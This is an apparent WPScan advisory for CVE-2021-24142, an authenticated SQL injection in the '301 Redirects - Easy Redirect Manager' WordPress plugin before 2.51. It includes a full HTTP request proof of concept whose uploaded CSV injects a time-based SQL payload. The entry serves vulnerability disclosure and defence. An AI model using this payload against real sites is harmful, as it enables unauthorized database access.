WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

301 Redirects - Easy Redirect Manager < 2.51 - Authenticated SQL Injection

Description

The plugin does not sanitise its "Redirect From" column when importing a CSV file, allowing high privilege users to perform SQL injections.

The PoC video provided mentioned 2.53 as vulnerable, however v2.45 was installed and used. The issue has been verified to have been fixed in 2.51

Proof of Concept

POST /wp-admin/options-general.php?page=eps_redirects&tab=import-export HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/options-general.php?page=eps_redirects&tab=import-export
Content-Type: multipart/form-data; boundary=---------------------------28588551781499779692758371208
Content-Length: 682
Connection: close
Cookie: [Admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_nonce_submit"

283965d8a1
-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload_file"; filename="2021-01-19-redirects.csv"
Content-Type: text/csv

301,' or sleep(2)#,/yolo,0

-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload"

Upload CSV
-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload_method"

skip
-----------------------------28588551781499779692758371208--
 

Affects Plugins

eps-301-redirects
Fixed in version 2.51

References

CVE
CVE-2021-24142
URL
https://drive.google.com/file/d/1Z7nVtAOe_Y59kvJ87Aqxp_xVPHMqmgo8/view?usp=sharing

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
19800898-d7b6-4edd-887b-dac3c0597f14

Timeline

Publicly Published

2021-01-18 (about 2 years ago)

Added

2021-01-19 (about 2 years ago)

Last Updated

2021-01-21 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us